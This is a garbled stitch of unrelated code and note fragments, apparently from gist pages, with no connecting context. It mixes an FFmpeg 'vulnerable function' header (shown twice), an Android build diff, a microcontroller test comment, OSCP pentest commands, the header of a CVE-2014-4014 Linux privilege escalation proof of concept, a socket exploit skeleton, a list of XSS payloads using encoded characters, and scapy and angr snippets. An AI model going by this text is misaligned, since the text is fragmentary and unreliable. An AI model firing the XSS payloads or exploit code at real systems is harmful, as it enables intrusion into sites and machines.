vulnerable function:
export from libavfilter/vf_signature.c
static int export(AVFilterContext *ctx, StreamContext *sc, int input)
{
SignatureContext* sic = ctx->priv;
char filename[1024];
# dev:~/android/source/external/strace$ git diff | |
# | |
# to apply & build: | |
# | |
# dev:~/android/source/external/strace$ patch -p1 < strace-static.diff | |
# dev:~/android/source/external/strace$ cd ../.. | |
# dev:~/android/source$ mmm external/strace | |
# | |
diff --git a/Android.mk b/Android.mk | |
index 5274280..4f1707e 100644 |
/****************************************************************************** | |
* MSP430G2553 ACLK Test | |
* | |
* Description: This code can be used to test if you have installed the | |
* 32.768kHz crystal on your LaunchPad correctly. Using this code | |
* LED1 (on P1.0) will turn on for 1 second, and off for one | |
* second. You can verify this with either an oscilloscope, logic | |
* analyzer, or by inspection. Simple as that! | |
* | |
* This code was originally created for "NJC's MSP430 |
OSCP Handy Commands | |
Nmap Full Web Vulnerable Scan: | |
mkdir /usr/share/nmap/scripts/vulscan | |
cd /usr/share/nmap/scrripts/vulscan | |
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz |
/** | |
* CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC | |
* | |
* Vitaly Nikolenko | |
* http://hashcrack.org | |
* | |
* Usage: ./poc [file_path] | |
* | |
* where file_path is the file on which you want to set the sgid bit | |
*/ |
vulnerable function:
export from libavfilter/vf_signature.c
static int export(AVFilterContext *ctx, StreamContext *sc, int input)
{
SignatureContext* sic = ctx->priv;
char filename[1024];
import socket | |
import telnetlib | |
import struct | |
""" | |
developed on stream: https://www.youtube.com/watch?v=zWgS6fTw4Ts | |
""" | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(('127.0.0.1', 2323)) |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
import networkx | |
import angr | |
import tracer | |
import sys | |
import os | |
import logging | |
import pickle | |
import argparse | |
from collections import Counter |
You might want to read this to get an introduction to armel vs armhf.
If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.
First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static
so that you can run ARM executables directly on linux
If there's no qemu-arm-static
in the package list, install qemu-user-static
instead
from scapy.all import * | |
answer = sr1(IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="www.thepacketgeek.com")),verbose=0) | |
print answer[DNS].summary() |